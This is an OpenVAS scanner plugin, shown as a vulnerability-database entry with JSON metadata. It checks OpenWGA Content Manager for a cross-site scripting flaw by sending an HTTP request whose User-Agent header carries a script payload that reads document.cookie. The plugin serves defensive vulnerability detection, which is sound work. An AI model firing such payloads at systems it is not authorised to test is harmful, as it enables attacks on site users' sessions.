ID OPENVAS:1361412562310807687 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2020-05-08T00:00:00
Description
The host is installed with OpenWGA Content Manager
and is prone to cross-site scripting vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# OpenWGA Content Manager Cross-site Scripting Vulnerability
#
# Authors:
# Kashinath T<tkashinath@secpod.com>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:OpenWGA_CMS:openwga";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.807687");
script_version("2020-05-08T08:34:44+0000");
script_tag(name:"cvss_base", value:"6.4");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:N");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2016-05-03 16:40:17 +0530 (Tue, 03 May 2016)");
script_name("OpenWGA Content Manager Cross-site Scripting Vulnerability");
script_tag(name:"summary", value:"The host is installed with OpenWGA Content Manager
and is prone to cross-site scripting vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
check whether its able to read cookie value.");
script_tag(name:"insight", value:"The flaw exists due to the input passed
via the User-Agent HTTP header is not properly sanitized before being returned
to the user.");
script_tag(name:"impact", value:"Successful exploitation will allow attackers
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.");
script_tag(name:"affected", value:"OpenWGA Content Manager 7.1.9 (Build 230)
OpenWGA Admin Client 7.1.7 (Build 82)
OpenWGA Server 7.1.9 Maintenance Release (Build 642)");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_vul");
script_xref(name:"URL", value:"https://packetstormsecurity.com/files/136681/ZSL-2016-5316.txt");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("gb_openwga_cms_detect.nasl");
script_mandatory_keys("OpenWGA/Installed");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if(!wgacmsPort = get_app_port(cpe:CPE)){
exit(0);
}
if(!dir = get_app_location(cpe:CPE, port:wgacmsPort)){
exit(0);
}
host = http_host_name(port:wgacmsPort);
url = dir + "plugin-contentmanager/html/contentstore.int.html";
req1 = 'GET ' + url + ' HTTP/1.1\r\n' +
'Host: ' + host + '\r\n' +
'Accept: */*\r\n' +
'Accept-Language: en\r\n' +
'User-Agent: <script>alert(document.cookie)</script>\r\n' +
'Connection: keep-alive\r\n' +
'\r\n';
res1 = http_keepalive_send_recv(port:wgacmsPort, data:req1);
if("<script>alert(document.cookie)</script>" >< res1 &&
res1 =~ "^HTTP/1\.[01] 200" && res1 =~ "OpenWG.*Server")
{
report = http_report_vuln_url(port:wgacmsPort, url:url);
security_message(port:wgacmsPort, data:report);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310807687", "type": "openvas", "bulletinFamily": "scanner", "title": "OpenWGA Content Manager Cross-site Scripting Vulnerability", "description": "The host is installed with OpenWGA Content Manager\n and is prone to cross-site scripting vulnerability.", "published": "2016-05-03T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807687", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["https://packetstormsecurity.com/files/136681/ZSL-2016-5316.txt"], "cvelist": [], "lastseen": "2020-05-12T17:22:42", "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-05-12T17:22:42", "rev": 2}, "score": {"value": -0.0, "vector": "NONE", "modified": "2020-05-12T17:22:42", "rev": 2}, "vulnersScore": -0.0}, "pluginID": "1361412562310807687", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenWGA Content Manager Cross-site Scripting Vulnerability\n#\n# Authors:\n# Kashinath T<tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:OpenWGA_CMS:openwga\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807687\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-03 16:40:17 +0530 (Tue, 03 May 2016)\");\n script_name(\"OpenWGA Content Manager Cross-site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with OpenWGA Content Manager\n and is prone to cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether its able to read cookie value.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the input passed\n via the User-Agent HTTP header is not properly sanitized before being returned\n to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary HTML and script code in a user's browser session in context\n of an affected site.\");\n\n script_tag(name:\"affected\", value:\"OpenWGA Content Manager 7.1.9 (Build 230)\n OpenWGA Admin Client 7.1.7 (Build 82)\n OpenWGA Server 7.1.9 Maintenance Release (Build 642)\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/136681/ZSL-2016-5316.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openwga_cms_detect.nasl\");\n script_mandatory_keys(\"OpenWGA/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!wgacmsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:wgacmsPort)){\n exit(0);\n}\n\nhost = http_host_name(port:wgacmsPort);\n\nurl = dir + \"plugin-contentmanager/html/contentstore.int.html\";\n\nreq1 = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'Accept-Language: en\\r\\n' +\n 'User-Agent: <script>alert(document.cookie)</script>\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\nres1 = http_keepalive_send_recv(port:wgacmsPort, data:req1);\n\nif(\"<script>alert(document.cookie)</script>\" >< res1 &&\n res1 =~ \"^HTTP/1\\.[01] 200\" && res1 =~ \"OpenWG.*Server\")\n{\n report = http_report_vuln_url(port:wgacmsPort, url:url);\n security_message(port:wgacmsPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": []}